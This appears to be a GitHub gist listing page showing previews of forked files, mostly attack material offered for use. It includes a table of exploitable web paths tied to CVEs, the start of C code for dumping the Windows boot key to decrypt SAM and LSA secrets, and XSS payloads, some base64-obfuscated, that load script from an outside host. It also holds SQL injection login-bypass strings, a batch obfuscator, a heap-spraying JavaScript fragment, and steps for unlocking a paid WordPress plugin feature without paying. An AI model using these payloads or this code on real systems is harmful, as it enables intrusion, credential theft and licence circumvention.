| Exploit/description | Path |
|---|---|
| Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
| CVE-2020-17519 | /jobmanager/logs/ |
| CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
| CVE-2018-1000130 | /jolokia |
| CVE-2018-1000130 | /actuator/jolokia |
| leak | /actuator/env |
hxlxmj
/ DumpBootKey.c
Created
October 19, 2025 16:20
— forked from Dfte/DumpBootKey.c
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #define BOOT_KEY_SIZE 16 | |
| #pragma warning(disable: 4996) | |
| void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) { | |
| HKEY hKey; | |
| LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey); | |
| if (result != ERROR_SUCCESS) { | |
| fprintf(stderr, "Error opening registry key: %ld\n", result); |
hxlxmj
/ exploitable_webpaths.md
Created
December 30, 2023 04:12
— forked from kafkaesqu3/exploitable_webpaths.md
easy wins - exploitable/leaky web paths
hxlxmj
/ subdomain_wordlist.md
Created
November 28, 2023 03:37
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
hxlxmj
/ m2sms
Created
November 18, 2023 23:45
— forked from spangey/m2sms
Email to SMS gateways in YAML
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| config: | |
| from_address: [email protected] | |
| carriers: | |
| alltel: | |
| name: Alltel | |
| value: @message.alltel.com | |
| ameritech: | |
| name: Ameritech | |
| value: @paging.acswireless.com |
hxlxmj
/ allinonemigration.md
Created
October 3, 2023 10:23
— forked from giovanni-d/allinonemigration.md
All-in-One WP Migration - Restore From Server (without PRO version) - Restore
If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally that was present in the version 6.77, follow the instructions below:
- Open the js file: wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js
- On line 1208, replace the code below:
$('.ai1wm-backup-restore').click(function (e) {
hxlxmj
/ xss_payloads.txt
Created
September 12, 2023 17:37
— forked from nullenc0de/xss_payloads.txt
XSS_Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "><script src="https://js.rip/t9eoip8zws"></script> | |
| javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)') | |
| "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> | |
| "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> | |
| "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> | |
| "><iframe srcdoc="<script>var a=parent.document.createElement("scr&# |
hxlxmj
/ sqli-auth-bypass.txt
Created
September 8, 2023 00:35
— forked from spenkk/sqli-auth-bypass.txt
SQL Injection Authentication Bypass payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| or 1=1 | |
| or 1=1-- | |
| or 1=1# | |
| or 1=1/* | |
| admin' -- | |
| admin' # | |
| admin'/* | |
| admin' or '1'='1 | |
| admin' or '1'='1'-- | |
| admin' or '1'='1'# |
hxlxmj
/ JavascriptRecon.md
Created
July 21, 2023 06:20
— forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty
hxlxmj
/ deobf.cmd
Created
April 1, 2023 17:25
— forked from a-sync/deobf.cmd
batch obfuscator / deobfuscator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off & setlocal | |
| if "%~1"=="" exit /b | |
| if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b | |
| <"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
NewerOlder